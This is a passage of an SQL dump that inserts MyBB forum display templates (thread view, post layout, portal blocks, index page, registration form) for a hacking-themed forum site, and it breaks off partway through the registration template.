{$pollbox}\r\n <div class=\"float_left\">\r\n {$multipage}\r\n\r\n </div>\r\n <div class=\"float_right\">\r\n {$selfclose}{$newreply}\r\n </div>\r\n {$ratethread}\r\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both; border-bottom-width: 0;\">\r\n <tr>\r\n <td class=\"thead\" colspan=\"2\">\r\n <div style=\"float: right;\">\r\n <span class=\"smalltext\"><strong><a href=\"showthread.php?mode=threaded&amp;tid={$tid}&amp;pid={$pid}#pid{$pid}\">{$lang->threaded}</a> | <a href=\"showthread.php?mode=linear&amp;tid={$tid}&amp;pid={$pid}#pid{$pid}\">{$lang->linear}</a></strong></span>\r\n </div>\r\n <div>\r\n <strong>{$thread[\'threadprefix\']}{$thread[\'subject\']}</strong>\r\n </div>\r\n </td>\r\n </tr>\r\n {$classic_header}\r\n </table>\r\n <div id=\"posts\">\r\n {$posts}\r\n </div>\r\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder1\" style=\"border-top-width: 0;\">\r\n <tr>\r\n <td colspan=\"2\" class=\"tfoot\">\r\n {$search_thread}\r\n <div>\r\n <strong>&laquo; <a href=\"{$next_oldest_link}\">{$lang->next_oldest}</a> | <a href=\"{$next_newest_link}\">{$lang->next_newest}</a> &raquo;</strong>\r\n </div>\r\n </td>\r\n </tr>\r\n </table>\r\n <div class=\"float_left\">\r\n {$multipage}\r\n </div>\r\n <div style=\"padding-top: 4px;\" class=\"float_right\">\r\n {$selfclose}{$newreply}\r\n </div>\r\n <br style=\"clear: both;\" />\r\n {$quickreply}\r\n {$threadexbox}\r\n {$similarthreads}\r\n <br />\r\n <div class=\"float_left\">\r\n <ul class=\"thread_tools\">\r\n <li class=\"printable\"><a href=\"printthread.php?tid={$tid}\">{$lang->view_printable}</a></li>\r\n <li class=\"sendthread\"><a href=\"sendthread.php?tid={$tid}\">{$lang->send_thread}</a></li>\r\n <li class=\"subscription_{$add_remove_subscription}\"><a href=\"usercp2.php?action={$add_remove_subscription}subscription&amp;tid={$tid}&amp;my_post_key={$mybb->post_code}\">{$add_remove_subscription_text}</a></li>\r\n </ul>\r\n </div>\r\n\r\n <div class=\"float_right\" style=\"text-align: right;\">\r\n {$moderationoptions}\r\n {$forumjump}\r\n </div>\r\n <br style=\"clear: both;\" />\r\n {$usersbrowsing}\r\n {$footer}\r\n</body>\r\n</html>', '8', '1608', '', '1350764672'); INSERT INTO mybb_templates VALUES('1962', 'postbit', '{$ignore_bit}\r\n<a name=\"pid{$post[\'pid\']}\" id=\"pid{$post[\'pid\']}\"></a>\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder1\" style=\"{$post_extra_style} {$post_visibility}\" id=\"post_{$post[\'pid\']}\">\r\n <tbody>\r\n <tr>\r\n <td class=\"tcat\">\r\n <div class=\"float_left smalltext\">\r\n {$post[\'postdate\']}, {$post[\'posttime\']} <span id=\"edited_by_{$post[\'pid\']}\">{$post[\'editedmsg\']}</span>\r\n </div>\r\n {$post[\'posturl\']}\r\n </td>\r\n </tr>\r\n\r\n <tr>\r\n <td class=\"trow1 {$unapproved_shade}\">\r\n <table cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;\">\r\n <tr>\r\n <td class=\"post_avatar\" width=\"1\" style=\"{$post[\'avatar_padding\']}\">\r\n {$post[\'useravatar\']}\r\n </td>\r\n <td class=\"post_author\">\r\n <strong><span class=\"largetext\">{$post[\'profilelink\']}</span></strong> {$post[\'onlinestatus\']}<br />\r\n <span class=\"smalltext\">\r\n {$post[\'usertitle\']}<br />\r\n {$post[\'userstars\']}\r\n {$post[\'groupimage\']}\r\n </span>\r\n </td>\r\n <td class=\"smalltext post_author_info\" width=\"165\">\r\n {$post[\'user_details\']}<!-- postbit_achivements -->{$post[\'achivementspostbit\']}<!-- /postbit_achivements -->\r\n </td>\r\n </tr>\r\n </table>\r\n </td>\r\n </tr>\r\n\r\n <tr>\r\n <td class=\"trow2 post_content {$unapproved_shade}\">\r\n <span class=\"smalltext\"><strong>{$post[\'icon\']}{$post[\'subject\']} {$post[\'subject_extra\']}</strong></span>\r\n\r\n <div class=\"post_body\" id=\"pid_{$post[\'pid\']}\">\r\n {$post[\'message\']}\r\n </div>\r\n {$post[\'attachments\']}\r\n {$post[\'signature\']}\r\n\r\n <div class=\"post_meta\" id=\"post_meta_{$post[\'pid\']}\">\r\n {$post[\'iplogged\']}\r\n </div>\r\n </td>\r\n </tr>\r\n\r\n <tr>\r\n <td class=\"trow1 post_buttons {$unapproved_shade}\">\r\n <div class=\"author_buttons float_left\">\r\n {$post[\'button_email\']}{$post[\'button_pm\']}{$post[\'button_www\']}{$post[\'button_find\']}{$post[\'button_rep\']}\r\n </div>\r\n <div class=\"post_management_buttons float_right\">{$post[\'button_edit\']}{$post[\'button_quickdelete\']}{$post[\'button_quote\']}{$post[\'button_multiquote\']}{$post[\'button_report\']}{$post[\'button_warn\']}{$post[\'button_reply_pm\']}{$post[\'button_replyall_pm\']}{$post[\'button_forward_pm\']}{$post[\'button_delete_pm\']}\r\n </div>\r\n </td>\r\n </tr>\r\n </tbody>\r\n</table>{$post[inline_ad]}', '8', '1608', '', '1351470181'); INSERT INTO mybb_templates VALUES('1963', 'memberlist_referrals_bit', '<td class=\"trow1 {$alt_bg}\" align=\"center\">{$user[\'referrals\']}</td>', '8', '1501', '', '1343925064'); INSERT INTO mybb_templates VALUES('1964', 'forumdisplay_newthread', '<a href=\"newthread.php?fid={$fid}\" class=\"postbit\">New Thread</a>', '8', '1608', '', '1343954116'); INSERT INTO mybb_templates VALUES('1986', 'reputation_addlink', '<div class=\"float_right\" style=\"padding-bottom: 4px;\"><a href=\"javascript:MyBB.reputation({$user[\'uid\']});\" class=\"postbit\">Add Rating</a></div>', '8', '1608', '', '1343954196'); INSERT INTO mybb_templates VALUES('1965', 'portal_announcement', '<table cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$icon} <a href=\"{$mybb->settings[\'bburl\']}/{$announcement[\'threadlink\']}\">{$announcement[\'subject\']}</a></strong><span class=\"smalltext float_right\">{$lang->posted_by} {$profilelink}</span></td>\n</tr>\n<tr>\n<td class=\"trow1\" align=\"left\">\n<span class=\"smalltext\"> {$anndate} {$anntime} {$numcomments}</span>\n<span class=\"float_right\"><a href=\"{$mybb->settings[\'bburl\']}/printthread.php?tid={$announcement[\'tid\']}\"><img src=\"{$theme[\'imgdir\']}/printable.gif\" alt=\"{$lang->print_this_item}\" title=\"{$lang->print_this_item}\" /></a>&nbsp;<a href=\"{$mybb->settings[\'bburl\']}/sendthread.php?tid={$announcement[\'tid\']}\"><img src=\"{$theme[\'imgdir\']}/send.gif\" alt=\"{$lang->send_to_friend}\" title=\"{$lang->send_to_friend}\" /></a></span>\n</td>\n</tr>\n<tr>\n<td class=\"trow1\">\n<table border=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\">\n <tr>\n <td class=\"tcat\">\n <p>\n {$message}\n </p>\n {$post[\'attachments\']}\n </td>\n </tr>\n</table>\n</td>\n</tr>\n</table>\n<br />', '8', '1501', '', '1343925064'); INSERT INTO mybb_templates VALUES('1966', 'portal_search', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$lang->search_forums}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" align=\"center\">\n<form method=\"post\" action=\"{$mybb->settings[\'bburl\']}/search.php\">\n<input type=\"hidden\" name=\"action\" value=\"do_search\" />\n<input type=\"hidden\" name=\"postthread\" value=\"1\" />\n<input type=\"hidden\" name=\"forums\" value=\"all\" />\n<input type=\"hidden\" name=\"showresults\" value=\"threads\" />\n<input type=\"text\" class=\"textbox\" name=\"keywords\" style=\"width:130px;\" value=\"\" />\n{$gobutton}\n</form>\n<span class=\"smalltext\">\n(<a href=\"{$mybb->settings[\'bburl\']}/search.php\">{$lang->advanced_search}</a>)\n</span>\n</td>\n</tr>\n</table>\n<br />', '8', '1501', '', '1343925064'); INSERT INTO mybb_templates VALUES('1967', 'portal_welcome_guesttext', '<span class=\"smalltext\">You have to <a href=\"{$mybb->settings[\'bburl\']}/member.php?action=register\">register</a> before you can post on {$mybb->settings[\'homename\']}.</span><br />\n<br />\n<form method=\"post\" action=\"{$portal_url}\"><input type=\"hidden\" name=\"action\" value=\"do_login\" />\n{$lang->username}<br />&nbsp;&nbsp;<input type=\"text\" class=\"textbox\" name=\"username\" value=\"\" /><br /><br />\n{$lang->password}<br />&nbsp;&nbsp;<input type=\"password\" class=\"textbox\" name=\"password\" value=\"\" /><br /><br />\n<label title=\"{$lang->remember_me_desc}\"><input type=\"checkbox\" class=\"checkbox\" name=\"remember\" value=\"yes\" /> {$lang->remember_me}</label><br /><br />\n<br /><input type=\"submit\" class=\"button\" name=\"loginsubmit\" value=\"{$lang->login}\" /></form>', '8', '1501', '', '1343925064'); INSERT INTO mybb_templates VALUES('1968', 'portal_latestthreads_thread', '<tr>\n<td class=\"{$altbg}\" colspan=\"2\">\n<strong><a href=\"{$mybb->settings[\'bburl\']}/{$thread[\'threadlink\']}\">{$thread[\'subject\']}</a></strong>\n<span class=\"smalltext\"><br />\n<em>{$lang->latest_threads_lastpost}</em> {$lastposterlink}<br />\n{$lastpostdate} {$lastposttime}<br />\n</span>\n</td>\n</tr>\n<tr>\n<td class=\"tcat\">\n<strong>&raquo; </strong>{$lang->latest_threads_replies} {$thread[\'replies\']}\n<td class=\"tcat\" width=\"50%\">\n<strong>&raquo; </strong>{$lang->latest_threads_views} {$thread[\'views\']}\n</td>\n</td>\n</tr>', '8', '1501', '', '1343925064'); INSERT INTO mybb_templates VALUES('1969', 'portal_latestthreads', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->latest_threads}</strong></td>\n</tr>\n{$threadlist}\n</table>\n<br />', '8', '1501', '', '1343925064'); INSERT INTO mybb_templates VALUES('1970', 'portal_stats', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$lang->forum_stats}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">\n<span class=\"smalltext\">\n<strong>&raquo; </strong>{$lang->num_members} {$stats[\'numusers\']}<br />\n<strong>&raquo; </strong>{$lang->latest_member} {$newestmember}<br />\n<strong>&raquo; </strong>{$lang->num_threads} {$stats[\'numthreads\']}<br />\n<strong>&raquo; </strong>{$lang->num_posts} {$stats[\'numposts\']}\n<br />\n</span>\n</td>\n</tr>\n<tr>\n<td class=\"trow1\">\n<a href=\"{$mybb->settings[\'bburl\']}/stats.php\">{$lang->full_stats}</a>\n</td>\n</tr>\n</table>\n<br />', '8', '1501', '', '1343925064'); INSERT INTO mybb_templates VALUES('1971', 'index', '<html>\r\n<head>\r\n<meta name=\"msvalidate.01\" content=\"F9F1E0456ECDA85FC21E8A39D6FE1B05\" />\r\n<meta name=\"google-site-verification\" content=\"n7BrYoUd7qjd7Fmg9JTLrSav2luYahk1wNoYmfGZTZc\" />\r\n<!-- bErhCCcakhu0PAUUPsq_ZjLtZ24 -->\r\n<title>{$mybb->settings[\'bbname\']}</title>\r\n{$headerinclude}\r\n<script type=\"text/javascript\">\r\n<!--\r\n lang.no_new_posts = \"{$lang->no_new_posts}\";\r\n lang.click_mark_read = \"{$lang->click_mark_read}\";\r\n// -->\r\n</script>\r\n</head>\r\n<body>\r\n{$header}{$tabmenu}\r\n{$forums}\r\n<script type=\"text/javascript\">\r\n<!--//\r\nvar myflowers=new ddtabcontent(\"menutabs\")\r\nmyflowers.setpersist(true)\r\nmyflowers.init()\r\n-->\r\n</script>\r\n\r\n{$boardstats}\r\n\r\n<table class=\"tborder\">\r\n<tr>\r\n<td height=\"34px\" class=\"thead\" colspan=\"1\">&nbsp;<strong>Social Networking</strong></td>\r\n</tr>\r\n<td class=\"trow1\" style=\"height: 36px\">\r\n<div style=\"margin-top: 4px;\">&nbsp;\r\n<a href=\"http://www.alexa.com/siteinfo/l33thacking.net?p=rwidget#reviews\" ><img src=\'http://www.alexa.com/images/widgets/black/dark/v1-125x60.png\' alt=\'Review l33thacking.net on alexa.com\' /></a>&nbsp;&nbsp;&nbsp;\r\n<a href=\"https://www.facebook.com/L33tHacking\"target=\"_blank\"><img id=\"facebook\" title=\"Like us on Facebook\" src=\"images/CoderGreen/sn/facebook.png\" /></a>&nbsp;&nbsp;&nbsp;\r\n<a href=\"http://twitter.com/l33thackingnet\" target=\"_blank\">&nbsp;<img id=\"Twitter\" title=\"Follow us on Twitter\" src=\"images/CoderGreen/sn/Twitter.png\" />&nbsp;</a>&nbsp;&nbsp;&nbsp;\r\n<a href=\"misc.php?action=syndication\" target=\"_blank\">&nbsp;<img id=\"rss\" title=\"Get our rss Feed\" src=\"images/CoderGreen/sn/feed.png\" />&nbsp;&nbsp;</a>\r\n<script type=\"text/rocketscript\">\r\n (function() {\r\n var po = document.createElement(\'script\'); po.type = \'text/javascript\'; po.async = true;\r\n po.src = \'https://apis.google.com/js/plusone.js\';\r\n var s = document.getElementsByTagName(\'script\')[0]; s.parentNode.insertBefore(po, s);\r\n })();\r\n</script>\r\n<div style=\"float: right;width: 70px; height: 25px\"><g:plusone></g:plusone></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n{$footer}\r\n</body>\r\n</html>', '8', '1608', '', '1351754722'); INSERT INTO mybb_templates VALUES('1972', 'postbit_email', '<a href=\"member.php?action=emailuser&amp;uid={$post[\'uid\']}\" class=\"postbit\">Email</a>', '8', '1608', '', '1343953519'); INSERT INTO mybb_templates VALUES('1973', 'postbit_delete_pm', '<a href=\"private.php?action=delete&amp;pmid={$id}&amp;my_post_key={$mybb->post_code}\" class=\"postbit\">Delete</a>', '8', '1608', '', '1343953573'); INSERT INTO mybb_templates VALUES('1974', 'postbit_edit', '<a href=\"editpost.php?pid={$post[\'pid\']}\" id=\"edit_post_{$post[\'pid\']}\" class=\"postbit\">Edit</a>\r\n<div id=\"edit_post_{$post[\'pid\']}_popup\" class=\"popup_menu\" style=\"display: none;\"><div class=\"popup_item_container\"><a href=\"javascript:;\" onclick=\"Thread.quickEdit({$post[\'pid\']});\" class=\"popup_item\">{$lang->postbit_quick_edit}</a></div><div class=\"popup_item_container\"><a href=\"editpost.php?pid={$post[\'pid\']}\" class=\"popup_item\">{$lang->postbit_full_edit}</a></div></div>\r\n<script type=\"text/javascript\">\r\n// <!--\r\n if(use_xmlhttprequest == \"1\")\r\n {\r\n new PopupMenu(\"edit_post_{$post[\'pid\']}\");\r\n }\r\n// -->\r\n</script>', '8', '1608', '', '1343953606'); INSERT INTO mybb_templates VALUES('1975', 'postbit_find', '<a href=\"search.php?action=finduser&amp;uid={$post[\'uid\']}\" class=\"postbit\">Find</a>', '8', '1608', '', '1343953635'); INSERT INTO mybb_templates VALUES('1976', 'postbit_forward_pm', '<a href=\"private.php?action=send&amp;pmid={$id}&amp;do=forward\" class=\"postbit\">Forward</a>', '8', '1608', '', '1343953677'); INSERT INTO mybb_templates VALUES('1977', 'postbit_multiquote', '<a href=\"javascript:Thread.multiQuote({$post[\'pid\']});\" style=\"display: none;\" id=\"multiquote_link_{$post[\'pid\']}\" class=\"postbit\">Multi</a>\r\n<script type=\"text/javascript\">\r\n//<!--\r\n $(\'multiquote_link_{$post[\'pid\']}\').style.display = \'\';\r\n// -->\r\n</script>', '8', '1608', '', '1343953712'); INSERT INTO mybb_templates VALUES('1978', 'postbit_pm', '<a href=\"private.php?action=send&amp;uid={$post[\'uid\']}\" class=\"postbit\">PM</a>', '8', '1608', '', '1343953745'); INSERT INTO mybb_templates VALUES('1979', 'postbit_quickdelete', '<a href=\"editpost.php?pid={$post[\'pid\']}\" onclick=\"Thread.deletePost({$post[\'pid\']}); return false;\" style=\"display: none;\" id=\"quick_delete_{$post[\'pid\']}\" class=\"postbit\">Delete</a>\r\n<script type=\"text/javascript\">\r\n// <!--\r\n $(\'quick_delete_{$post[\'pid\']}\').style.display = \'\';\r\n// -->\r\n</script>', '8', '1608', '', '1343953793'); INSERT INTO mybb_templates VALUES('1980', 'postbit_quote', '<a href=\"newreply.php?tid={$tid}&amp;pid={$post[\'pid\']}\" class=\"postbit\">Quote</a>', '8', '1608', '', '1343953825'); INSERT INTO mybb_templates VALUES('1981', 'postbit_rep_button', '<a href=\"javascript:MyBB.reputation({$post[\'uid\']},{$post[\'pid\']});\" class=\"postbit\">Add Rep</a>', '8', '1608', '', '1343953929'); INSERT INTO mybb_templates VALUES('1982', 'postbit_reply_pm', '<a href=\"private.php?action=send&amp;pmid={$id}&amp;do=reply\" class=\"postbit\">Reply</a>', '8', '1608', '', '1343953957'); INSERT INTO mybb_templates VALUES('1983', 'postbit_replyall_pm', '<a href=\"private.php?action=send&amp;pmid={$id}&amp;do=replyall\" class=\"postbit\">Reply All</a>', '8', '1608', '', '1343953983'); INSERT INTO mybb_templates VALUES('1984', 'postbit_report', '<a href=\"javascript:Thread.reportPost({$post[\'pid\']});\" class=\"postbit\">Report</a>', '8', '1608', '', '1343954019'); INSERT INTO mybb_templates VALUES('1985', 'postbit_www', '<a href=\"{$post[\'website\']}\" target=\"_blank\" class=\"postbit\">Website</a>', '8', '1608', '', '1343954069'); INSERT INTO mybb_templates VALUES('1987', 'showthread_newreply', '<a href=\"newreply.php?tid={$tid}\" class=\"postbit\">Reply</a>&nbsp;', '8', '1608', '', '1343954232'); INSERT INTO mybb_templates VALUES('1988', 'showthread_newreply_closed', '<a href=\"newreply.php?tid={$tid}\" class=\"postbit\">Closed</a>&nbsp;', '8', '1608', '', '1343954277'); INSERT INTO mybb_templates VALUES('1989', 'postbit_warn', '<a href=\"warnings.php?action=warn&amp;uid={$post[\'uid\']}&amp;pid={$post[\'pid\']}\" class=\"postbit\">Warn</a>', '8', '1608', '', '1343954326'); INSERT INTO mybb_templates VALUES('1991', 'postbit_classic', '{$ignore_bit}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"{$post_extra_style} {$post_visibility}\" id=\"post_{$post[\'pid\']}\">\n <tr>\n <td class=\"{$altbg}\" width=\"15%\" valign=\"top\" style=\"white-space: nowrap; text-align: center;\"><a name=\"pid{$post[\'pid\']}\" id=\"pid{$post[\'pid\']}\"></a>\n <strong><span class=\"largetext\">{$post[\'profilelink\']}</span></strong> {$post[\'onlinestatus\']}<br />\n <span class=\"smalltext\">\n {$post[\'usertitle\']}<br />\n {$post[\'userstars\']}\n {$post[\'groupimage\']}\n {$post[\'useravatar\']}<br />\n {$post[\'user_details\']}<!-- postbit_achivements -->{$post[\'achivementspostbit\']}<!-- /postbit_achivements -->\n </span>\n </td>\n <td class=\"{$altbg}\" valign=\"top\">\n <table width=\"100%\">\n <tr><td>{$post[\'posturl\']}<span class=\"smalltext\"><strong>{$post[\'icon\']}{$post[\'subject\']} {$post[\'subject_extra\']}</strong></span>\n <br />\n <div id=\"pid_{$post[\'pid\']}\" class=\"post_body\">\n {$post[\'message\']}\n </div>\n {$post[\'attachments\']}\n {$post[\'signature\']}\n <div style=\"text-align: right; vertical-align: bottom;\" id=\"post_meta_{$post[\'pid\']}\">\n <div id=\"edited_by_{$post[\'pid\']}\">{$post[\'editedmsg\']}</div>\n {$post[\'iplogged\']}\n </div>\n </td></tr>\n </table>\n</td>\n</tr>\n<tr>\n <td class=\"{$altbg}\" style=\"white-space: nowrap; text-align: center; vertical-align: middle;\"><span class=\"smalltext\">{$post[\'postdate\']} {$post[\'posttime\']}</span></td>\n <td class=\"{$altbg}\" style=\"vertical-align: middle;\">\n <table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">\n <tr valign=\"bottom\">\n <td align=\"left\" ><span class=\"smalltext\">{$post[\'button_email\']}{$post[\'button_pm\']}{$post[\'button_www\']}{$post[\'button_find\']}{$post[\'button_rep\']}</span></td>\n <td align=\"right\">{$post[\'button_edit\']}{$post[\'button_quickdelete\']}{$post[\'button_quote\']}{$post[\'button_multiquote\']}{$post[\'button_report\']}{$post[\'button_warn\']}{$post[\'button_reply_pm\']}{$post[\'button_replyall_pm\']}{$post[\'button_forward_pm\']}{$post[\'button_delete_pm\']}</td>\n </tr>\n </table>\n </td>\n</tr>\n</table>{$post[inline_ad]}', '8', '1608', '', '1345218566'); INSERT INTO mybb_templates VALUES('1992', 'headerinclude', '{$metadescription}\r\n{$metakeywords}\r\n<link rel=\"alternate\" type=\"application/rss+xml\" title=\"{$lang->latest_threads} (RSS 2.0)\" href=\"{$mybb->settings[\'bburl\']}/syndication.php\" />\n<link rel=\"alternate\" type=\"application/atom+xml\" title=\"{$lang->latest_threads} (Atom 1.0)\" href=\"{$mybb->settings[\'bburl\']}/syndication.php?type=atom1.0\" />\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset={$charset}\" />\n<meta http-equiv=\"Content-Script-Type\" content=\"text/javascript\" />\n<script type=\"text/javascript\" src=\"{$mybb->settings[\'bburl\']}/jscripts/prototype.js?ver=1603\"></script>\n<script type=\"text/javascript\" src=\"{$mybb->settings[\'bburl\']}/jscripts/general.js?ver=1603\"></script>\n<script type=\"text/javascript\" src=\"{$mybb->settings[\'bburl\']}/jscripts/popup_menu.js?ver=1600\"></script>\n{$stylesheets}\n<script type=\"text/javascript\">\n<!--\n var cookieDomain = \"{$mybb->settings[\'cookiedomain\']}\";\n var cookiePath = \"{$mybb->settings[\'cookiepath\']}\";\n var cookiePrefix = \"{$mybb->settings[\'cookieprefix\']}\";\n var deleteevent_confirm = \"{$lang->deleteevent_confirm}\";\n var removeattach_confirm = \"{$lang->removeattach_confirm}\";\n var loading_text = \'{$lang->ajax_loading}\';\n var saving_changes = \'{$lang->saving_changes}\';\n var use_xmlhttprequest = \"{$mybb->settings[\'use_xmlhttprequest\']}\";\n var my_post_key = \"{$mybb->post_code}\";\n var imagepath = \"{$theme[\'imgdir\']}\";\n// -->\n</script>\n{$newpmmsg}\r\n<script type=\"text/javascript\" src=\"{$mybb->settings[\'bburl\']}/jscripts/tabcontent.js\">\r\n/***********************************************\r\n* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)\r\n* This notice MUST stay intact for legal use\r\n* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code\r\n***********************************************/\r\n</script>', '8', '1608', '', '1343954663'); INSERT INTO mybb_templates VALUES('1993', 'forumdisplay_subforums', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<tr>\r\n<td class=\"thead\" colspan=\"6\" align=\"center\"><strong>{$lang->sub_forums_in}</strong></td>\r\n</tr>\r\n<tr>\r\n<td class=\"tcat\" width=\"2%\">&nbsp;</td>\r\n<td class=\"tcat\" width=\"59%\"><span class=\"smalltext\"><strong>{$lang->forumbit_forum}</strong></span></td>\r\n<td class=\"tcat\" width=\"7%\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_threads}</strong></span></td>\r\n<td class=\"tcat\" width=\"7%\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_posts}</strong></span></td>\r\n<td class=\"tcat\" width=\"15%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->forumbit_lastpost}</strong></span></td>\r\n</tr>\r\n{$forums}\r\n</table>\r\n<br />', '8', '1608', '', '1344010593'); INSERT INTO mybb_templates VALUES('1995', 'moderation_getip', '<html>\r\n<head>\r\n<title>{$mybb->settings[\'bbname\']} - {$lang->get_post_ip}</title>\r\n{$headerinclude}\r\n</head>\r\n<body>\r\n{$header}\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<tr>\r\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->get_post_ip}</strong></td>\r\n</tr>\r\n<tr>\r\n<td class=\"trow1\" width=\"20%\"><strong>{$lang->username}</strong></td>\r\n<td class=\"trow1\">{$username}</td>\r\n</tr>\r\n<tr>\r\n<td class=\"trow2\"><strong>{$lang->ip_address}</strong></td>\r\n<td class=\"trow2\">{$post[\'ipaddress\']}</td>\r\n</tr>\r\n<tr>\r\n<td class=\"trow1\"><strong>{$lang->hostname}<br /><span class=\"smalltext\">{$lang->if_resolvable}</span></strong></td>\r\n<td class=\"trow2\">{$hostname}</td>\r\n</tr>\r\n<tr>\r\n<td class=\"trow1\"><strong>Who is Lookup<br /><span class=\"smalltext\"></span></strong></td>\r\n<td class=\"trow2\"><a href=\"http://whois.domaintools.com/{$post[\'ipaddress\']}\">Click here to do a Whois Search</a></td>\r\n</tr>\r\n{$modoptions}\r\n</table>\r\n{$footer}\r\n</body>\r\n</html>', '8', '1608', '', '1344036190'); INSERT INTO mybb_templates VALUES('1996', 'postbit_iplogged_hiden', '<!--<p class=\"smalltext\">{$lang->postbit_ipaddress} <a href=\"moderation.php?action=getip&amp;pid={$post[\'pid\']}\">{$lang->postbit_ipaddress_logged}</a></p>-->\r\n<p class=\"smalltext\">{$lang->postbit_ipaddress} <a href=\"moderation.php?action=getip&amp;pid={$post[\'pid\']}\">{$post[\'ipaddress\']}</a></p>', '8', '1608', '', '1344036534'); INSERT INTO mybb_templates VALUES('1997', 'memberlist_user', '<tr>\r\n <td class=\"{$alt_bg}\" align=\"center\">{$user[\'avatar\']}</td>\r\n <td class=\"{$alt_bg}\">{$user[\'profilelink\']}<br />\r\n<span class=\"smalltext\">\r\n {$user[\'usertitle\']}<br />\r\n {$usergroup[\'groupimage\']}\r\n {$user[\'userstars\']}\r\n</span></td>\r\n <td class=\"{$alt_bg}\" align=\"center\">{$user[\'regdate\']}</td>\r\n <td class=\"{$alt_bg}\" align=\"center\">{$user[\'lastvisit\']}</td>\r\n <td class=\"{$alt_bg}\" align=\"center\">{$user[\'reputation\']}</td>\r\n <td class=\"{$alt_bg}\" align=\"center\">{$user[\'postnum\']}</td>\r\n {$referral_bit}\r\n</tr>', '8', '1608', '', '1344037121'); INSERT INTO mybb_templates VALUES('1998', 'member_register', '<html>\r\n<head>\r\n<title>{$mybb->settings[\'bbname\']} - {$lang->registration}</title>\r\n{$headerinclude}\r\n<script type=\"text/javascript\" src=\"jscripts/validator.js\"></script>\r\n</head>\r\n<body>\r\n{$header}\r\n<br />\r\n<form action=\"member.php\" method=\"post\" id=\"registration_form\"><input type=\"text\" style=\"visibility: hidden;\" value=\"\" name=\"regcheck1\" /><input type=\"text\" style=\"visibility: hidden;\" value=\"true\" name=\"regcheck2\" />\r\n{$regerrors}\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<tr>\r\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->registration}</strong></td>\r\n</tr>\r\n<tr>\r\n<td width=\"50%\" class=\"trow1\" valign=\"top\">\r\n<fieldset class=\"trow2\">\r\n<legend><strong>{$lang->account_details}</strong></legend>\r\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\">\r\n<tr>\r\n<td colspan=\"2\"><span class=\"smalltext\"><label for=\"username\">{$lang->username}</label></span></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><input type=\"text\" class=\"textbox\" name=\"username\" id=\"username\" style=\"width: 100%\" value=\"{$username}\" /></td>\r\n</tr>\r\n{$passboxes}\r\n<tr>\r\n<td><span class=\"smalltext\"><label for=\"email\">{$lang->email}</label></span></td>\r\n<td><span class=\"smalltext\"><label for=\"email2\">{$lang->confirm_email}</label></span></td>\r\n</tr>\r\n<tr>\r\n<td></ br><span class=\"smalltext\"><font color=\"00ff00\">Please check the SPAM MAIL folder if by chance you didn\'t got activation email, it would be there.</font></td>\r\n</tr>\r\n<tr>\r\n<td><input type=\"text\" class=\"textbox\" name=\"email\" id=\"email\" style=\"width: 100%\" maxlength=\"50\" value=\"{$email}\" /></td>\r\n<td><input type=\"text\" class=\"textbox\" name=\"email2\" id=\"email2\" style=\"width: 100%\" maxlength=\"50\" value=\"{$email2}\" /></td>\r\n</tr> \r\n<tr>\r\n <td colspan=\"2\" style=\"display: none;\" id=\"email_status\">&nbsp;</td>\r\n</font>\r\n</tr>\r\n<tr>\r\n</tr>\r\n<tr>\r\n{$hiddencaptcha}\r\n\r\n</table>\r\n</fieldset>\r\n{$requiredfields}\r\n{$referrer}\r\n{$regimage}\r\n</td>\r\n<td width=\"50%\" class=\"trow1\" valign=\"top\">\r\n<fieldset class=\"trow2\">\r\n<legend><strong>{$lang->account_prefs}</strong></legend>\r\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\">\r\n<tr>\r\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"allownotices\" id=\"allownotices\" value=\"1\" {$allownoticescheck} /></td>\r\n<td valign=\"top\"><span class=\"smalltext\"><label for=\"allownotices\">{$lang->allow_notices}</label></span></td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" 